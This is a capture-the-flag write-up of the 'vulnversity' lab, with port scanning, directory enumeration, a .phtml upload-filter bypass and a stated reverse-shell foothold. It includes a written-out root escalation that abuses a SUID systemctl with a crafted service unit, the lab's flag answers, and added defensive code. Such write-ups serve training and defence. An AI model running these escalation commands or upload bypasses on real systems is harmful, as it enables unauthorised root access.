✅Scan the box; how many ports are open?
┌──(root㉿kali)-[~/hack/LAB/vulnversity]
└─# nmap -p- --open --max-retries 1 --min-rate 3000 10.10.178.151 -Pn
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-09-12 21:48 KST
Nmap scan report for 10.10.178.151
Host is up (0.29s latency).
Not shown: 65391 closed tcp ports (reset), 138 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3128/tcp open squid-http
3333/tcp open dec-notes
Nmap done: 1 IP address (1 host up) scanned in 24.65 seconds
Answer : 6
✅What version of the squid proxy is running on the machine?
┌──(root㉿kali)-[~/hack/LAB/vulnversity]
└─# nmap -sV -sC -Pn -p 3128 10.10.178.151
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-09-12 21:50 KST
Nmap scan report for 10.10.178.151
Host is up (0.37s latency).
PORT STATE SERVICE VERSION
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.5.12
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 21.80 seconds
Answer : 3.5.12
✅How many ports will Nmap scan if the flag -p-400 was used?
Answer : 400
✅What is the most likely operating system this machine is running?
No exact OS matches for host (If you know what OS is running on it, see <https://nmap.org/submit/> ).
TCP/IP fingerprint:
Network Distance: 5 hops
OS detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 19.46 seconds
Answer : Ubuntu
✅What port is the web server running on?
Answer : 3333
✅It's essential to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don't forget that ports on a higher range might be open, so constantly scan ports after 1000 (even if you leave checking in the background).
Answer : YES
✅What is the flag for enabling verbose mode using Nmap?
Answer : -V
✅I have successfully configured Gobuster.
Answer : YES
✅What is the directory that has an upload form page?
┌──(root㉿kali)-[~/hack/LAB/vulnversity]
└─# gobuster dir -k -w /usr/share/dirb/wordlists/common.txt -u <http://10.10.178.151:3333/>
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: <http://10.10.178.151:3333/>
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 294]
/.htaccess (Status: 403) [Size: 299]
/.htpasswd (Status: 403) [Size: 299]
/css (Status: 301) [Size: 319] [--> <http://10.10.178.151:3333/css/>]
/fonts (Status: 301) [Size: 321] [--> <http://10.10.178.151:3333/fonts/>]
/images (Status: 301) [Size: 322] [--> <http://10.10.178.151:3333/images/>]
/index.html (Status: 200) [Size: 33014]
/internal (Status: 301) [Size: 324] [--> <http://10.10.178.151:3333/internal/>]
/js (Status: 301) [Size: 318] [--> <http://10.10.178.151:3333/js/>]
Answer : /internal/
✅What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out.
Answer : .php
✅I understand the Burpsuite tool and its purpose during pentesting.
Answer : YES
✅What extension is allowed after running the above exercise?
Answer : .phtml
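The .php/.phtml result above is what a blocklist filter produces: it only rejects the spellings it knows, while Ubuntu's Apache php module handles .php, .phar and .phtml alike. This added example (not the room's code, written here to illustrate the fix) puts a constructed blocklist filter that behaves like the one observed beside an allowlist filter that stores uploads under a server-chosen name; the extension set and the name pattern are assumptions for an image upload form.

```python
import os
import re
import secrets

# Blocklist filter, constructed to reproduce what the writeup observes on
# /internal/: ".php" is rejected but ".phtml" is accepted. Not the room's code.
BLOCKED_EXTENSIONS = {".php"}

def blocklist_allows(filename: str) -> bool:
    """Vulnerable: only rejects the extensions it has explicitly listed."""
    _, ext = os.path.splitext(filename)
    return ext.lower() not in BLOCKED_EXTENSIONS

# Hardened filter: an allowlist of the extensions the form actually needs
# (assumed: an image upload). The pattern admits exactly one dot, so
# "shell.phtml", "shell.php.jpg" and "../x.png" all fail before the
# extension is even compared.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")

def allowlist_allows(filename: str) -> bool:
    """Hardened: accept only if the whole name matches and the extension is allowlisted."""
    m = SAFE_NAME.fullmatch(filename)
    return m is not None and m.group(1).lower() in ALLOWED_EXTENSIONS

def stored_name(filename: str) -> str:
    """Name to store an accepted upload under: random stem, normalised extension.

    The client-supplied name never reaches the filesystem, and the upload
    directory should sit outside the web root (or have script execution off).
    """
    if not allowlist_allows(filename):
        raise ValueError("upload rejected: " + filename)
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"
```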
✅While completing the above exercise, I have successfully downloaded the PHP reverse shell.
Checked the path the file was uploaded to and executed it
Checked whether the software needed for a reverse shell connection was present
Got an initial foothold with the Python3 reverse shell script taken from revshell
Answer : YES
✅What is the name of the user who manages the webserver?
www-data@vulnuniversity:/home$ ls -la
total 12
drwxr-xr-x 3 root root 4096 Jul 31 2019 .
drwxr-xr-x 23 root root 4096 Jul 31 2019 ..
drwxr-xr-x 2 bill bill 4096 Jul 31 2019 bill
Answer : bill
✅What is the user flag?
www-data@vulnuniversity:/home$ cd bill
www-data@vulnuniversity:/home/bill$ ls -la
total 24
drwxr-xr-x 2 bill bill 4096 Jul 31 2019 .
drwxr-xr-x 3 root root 4096 Jul 31 2019 ..
-rw-r--r-- 1 bill bill 220 Jul 31 2019 .bash_logout
-rw-r--r-- 1 bill bill 3771 Jul 31 2019 .bashrc
-rw-r--r-- 1 bill bill 655 Jul 31 2019 .profile
-rw-r--r-- 1 bill bill 33 Jul 31 2019 user.txt
www-data@vulnuniversity:/home/bill$ cat user.txt
8bd7992fbe8a6ad22a63361004cfcedb
Answer : 8bd7992fbe8a6ad22a63361004cfcedb
✅On the system, search for all SUID files. Which file stands out?
www-data@vulnuniversity:/home/bill$ find / -type f -perm -4000 2>/dev/null
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs
Answer : /bin/systemctl
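The way a defender spots /bin/systemctl in that list is not by eyeballing it but by diffing the live SUID set against a baseline recorded from a known-good build. The following added example (not part of the writeup) does that diff over a subset of the find output above and also flags SUID files in directories where none belong; the baseline contents and the risky-directory list are constructed assumptions.

```python
# Constructed baseline: the SUID set recorded from a known-good build of the
# same image. Keep it read-only and off the host. It lists expected files,
# not "safe" ones, so every addition or removal deserves a look.
SUID_BASELINE = """
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/pkexec
/usr/lib/openssh/ssh-keysign
/usr/lib/squid/pinger
/bin/su
/bin/mount
/bin/umount
/bin/ping
"""

# Subset of the find output shown in the writeup, used as the sample input.
CURRENT_FIND_OUTPUT = """
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/pkexec
/usr/lib/openssh/ssh-keysign
/usr/lib/squid/pinger
/bin/su
/bin/mount
/bin/umount
/bin/ping
/bin/systemctl
"""

# Places where a SUID file should never appear on a server (assumption).
RISKY_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/opt/")

def parse_paths(text: str) -> set:
    """One absolute path per line; blank lines and find's error noise are ignored."""
    return {ln.strip() for ln in text.splitlines() if ln.strip().startswith("/")}

def audit_suid(find_output: str, baseline: str = SUID_BASELINE) -> dict:
    """Diff the live SUID set against the baseline and flag odd locations."""
    found, expected = parse_paths(find_output), parse_paths(baseline)
    return {
        "unexpected": sorted(found - expected),    # new SUID files: investigate
        "missing": sorted(expected - found),       # gone: patch, or tampering
        "risky_location": sorted(p for p in found if p.startswith(RISKY_PREFIXES)),
    }

if __name__ == "__main__":
    # On a live host, feed it the real scan: find / -type f -perm -4000 2>/dev/null
    for key, paths in audit_suid(CURRENT_FIND_OUTPUT).items():
        print(key, paths)
```

systemctl has no legitimate need for the SUID bit; `chmod u-s /bin/systemctl` removes it, and the drift check above is what catches it being set again.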
✅What is the root flag value?
www-data@vulnuniversity:/home/bill$ cd /bin
www-data@vulnuniversity:/bin$ TF=$(mktemp).service
www-data@vulnuniversity:/bin$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
> [Install]
> WantedBy=multi-user.target' > $TF
www-data@vulnuniversity:/bin$ ./systemctl link $TF
Created symlink from /etc/systemd/system/tmp.emh8H8dSWF.service to /tmp/tmp.emh8H8dSWF.service.
www-data@vulnuniversity:/bin$ ./systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.emh8H8dSWF.service to /tmp/tmp.emh8H8dSWF.service.
www-data@vulnuniversity:/bin$ cat /tmp/output
a58ff8579f0a9270368d33a9966c7fd5
Answer : a58ff8579f0a9270368d33a9966c7fd5
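The two "Created symlink" lines above are the artefact this escalation leaves behind: unit links under /etc/systemd/system that point into /tmp. As an added example (not part of the writeup), this audit walks a unit directory and reports symlinks whose target lives in a world-writable or user-owned location; `demo()` rebuilds that symlink layout in a temporary directory so the check can run offline. The untrusted-directory list is an assumption.

```python
import os
import tempfile

# Unit files belong under /etc, /lib or /usr. A link into any of these
# writable locations is the pattern the session above produced (assumption).
UNTRUSTED_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")

def find_untrusted_unit_links(unit_dir: str = "/etc/systemd/system") -> list:
    """Return sorted (link, target) pairs for unit symlinks into untrusted dirs."""
    hits = []
    for root, _dirs, files in os.walk(unit_dir):
        for name in files:  # dangling symlinks land here too
            link = os.path.join(root, name)
            if not os.path.islink(link):
                continue
            target = os.readlink(link)
            if not os.path.isabs(target):
                target = os.path.normpath(os.path.join(root, target))
            if target.startswith(UNTRUSTED_PREFIXES):
                hits.append((link, target))
    return sorted(hits)

def demo() -> list:
    """Constructed replica of /etc/systemd/system after `systemctl link` + `enable --now`."""
    base = tempfile.mkdtemp()
    wants = os.path.join(base, "multi-user.target.wants")
    os.mkdir(wants)
    # A normal package-installed unit link (dangling in this sandbox, which is fine)
    os.symlink("/lib/systemd/system/ssh.service", os.path.join(wants, "ssh.service"))
    # The two links the session above created
    unit = "tmp.emh8H8dSWF.service"
    os.symlink("/tmp/" + unit, os.path.join(base, unit))
    os.symlink("/tmp/" + unit, os.path.join(wants, unit))
    return find_untrusted_unit_links(base)

if __name__ == "__main__":
    for link, target in demo():
        print(f"{link} -> {target}")
```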